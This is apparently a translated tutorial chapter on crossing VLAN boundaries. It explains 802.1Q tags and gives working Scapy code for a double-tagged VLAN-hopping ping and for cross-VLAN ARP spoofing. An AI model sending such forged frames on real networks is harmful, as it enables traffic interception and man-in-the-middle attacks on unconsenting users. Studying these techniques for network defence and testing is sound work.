Python black hat programming 3.4 across VLAN

VLAN (Virtual Local Area Network) is a virtual network built based on Ethernet interaction technology. It can not only divide the same physical network into multiple VALNs, but also cross physical network barriers and divide users in different subnets into in the same VLAN. Figure 2 is an example of VLAN division.

Figure 2

There are many ways to implement VLAN. There are generally two types of VLAN division based on switching equipment:

l Switch-based port division

l Based on IEEE 802.1q protocol, extended Ethernet frame format

Layer 2-based VLAN Technology, there is the concept of Trunking, which is used to connect different switches to ensure that members of the same VLAN established across multiple switches can communicate with each other. The ports used for interconnection between switches are called Trunk ports. In addition to 80.2.1q, Cisco has its own Trunk protocol called ISL.

Figure 3

Figure 3 is an 802.1q data packet, which is not essentially different from an ordinary Ethernet frame. Just add a VLAN Tag. The VLAN Identifier in the red part identifies which VLAN a data packet belongs to, thus ensuring that the range of data broadcast does not span VLANs.

Now let’s think about it briefly. If we want to communicate across VLANs, can we just modify the identifier in the data packet?

3.4.1 VLAN Hopping

Based on the above analysis, we consider a simple scenario: cross-VLAN ping, Send a ping request from a host in Vlan1 to a host in Vlan2.

Before specific coding, we still need to solve the problem of VLAN packet construction. In Scapy, we use the Dot1Q class to construct the Tag part in Figure 3. As shown in Figure 4.

Figure 4

Now we can write a cross-VLAN ping request.

#!/usr/bin/python 
from scapy.all import * 
packet = Ether(dst="c0:d3:de:ad:be:ef") / \
Dot1Q(vlan=1) / \
Dot1Q(vlan=2) / \
IP(dst="192.168.13.3") / \
ICMP() 
sendp(packet)

In the above code we specify the MAC and IP address of the target host, and add two VLAN identifiers, the first one is for sending data The VLAN where the host is located, and the second one is the VLAN where the target host is located. The switch will remove the first identifier, and when it reads the second identifier, it will forward the packet to the target host.

3.4.2 Cross-VLAN ARP spoofing

3.1, 3.2 and 3.3 We are all discussing the issue of ARP spoofing. Since VLAN limits the broadcast domain, our previous code cannot perform ARP spoofing across VLANs. However, it is very simple to solve this problem. We only need to insert the VLAN identifier into the ARP spoofing data we constructed previously. The following code is the code we used to construct the ARP request packet in Section 3.1.

def build_req():
if options.target is None:
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0])
elif options.target:
target_mac = getmacbyip(options.target)
if target_mac is None:
print "[-] Error: Could not resolve targets MAC address"
sys.exit(1)
pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
return pkt

In the part of constructing the data packet, we insert the VLAN identifier:

pkt = Ether(src=mac, dst=target_mac) /Dot1Q(vlan=our_vlan) / Dot1Q(vlan=target_vlan) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)

In this way, cross-VLAN ARP spoofing can be achieved.

3.4.3 Summary

This section mainly talks about how to construct data packets that spoof VLAN to achieve cross-VLAN Data communication and ARP spoofing purposes. It should be noted that the method in this article mainly targets the 802.1Q protocol and has no effect on VLANs that are physically isolated by ports.

The above is the detailed explanation of Python black hat programming 3.4 across VLANs introduced by the editor. I hope it will be helpful to you. If you have any questions, please leave me a message and the editor will reply in time. Ours. I would also like to thank you all for your support of the PHP Chinese website!

For more Python black hat programming 3.4 cross-VLAN related articles, please pay attention to the PHP Chinese website!